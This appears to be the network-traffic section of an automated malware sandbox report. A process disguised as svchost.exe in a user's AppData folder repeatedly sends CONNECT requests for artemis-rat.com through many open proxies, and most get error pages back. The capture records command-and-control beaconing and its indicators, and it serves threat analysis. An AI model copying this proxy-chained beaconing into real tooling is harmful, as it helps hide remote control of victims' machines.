                                                                                    Mar 9, 2024 13:14:32.514600039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2922192.168.2.559419115.74.157.191108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.514600039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.380332947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.548201084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2923192.168.2.559497159.65.233.115800043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.518975019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.743905067 CET32INHTTP/1.0 504 Gateway Timeout


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2924192.168.2.55963361.130.9.3844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.522556067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2925192.168.2.559524185.162.231.2268043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.523636103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.677988052 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2926192.168.2.559426194.247.173.17808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.524498940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2927192.168.2.55963461.130.9.3844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.525240898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2928192.168.2.559520172.64.207.1858043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.528736115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.690241098 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2929192.168.2.55963861.130.9.3844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.529334068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2930192.168.2.558843218.57.210.186900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.529942989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.442811966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.942748070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.833848953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2931192.168.2.55963961.130.9.3844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.531076908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2932192.168.2.559435221.194.149.88043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.558604002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.333794117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.354866028 CET713INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.19.10
                                                                                    Date: Sat, 09 Mar 2024 12:14:36 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 560
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.10</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2933192.168.2.5595113.212.148.199312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.558662891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.783179998 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2934192.168.2.55714750.63.12.332549243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.558662891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2935192.168.2.559560104.17.239.108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.562094927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.716679096 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2936192.168.2.55949647.114.101.57888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.568747997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.879882097 CET334INHTTP/1.1 400 Bad Request
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2937192.168.2.559464120.78.191.2258043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.573215961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.380436897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.721199036 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2938192.168.2.559680152.32.132.22044343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.575476885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2939192.168.2.559568199.188.93.214900043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.576591969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2940192.168.2.559683152.32.132.22044343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.576685905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2941192.168.2.559687152.32.132.22044343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.577864885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2942192.168.2.559689152.32.132.22044343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.579510927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2943192.168.2.559447216.9.224.1138043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.584888935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2944192.168.2.559586185.162.228.488043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.585386992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.739542961 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
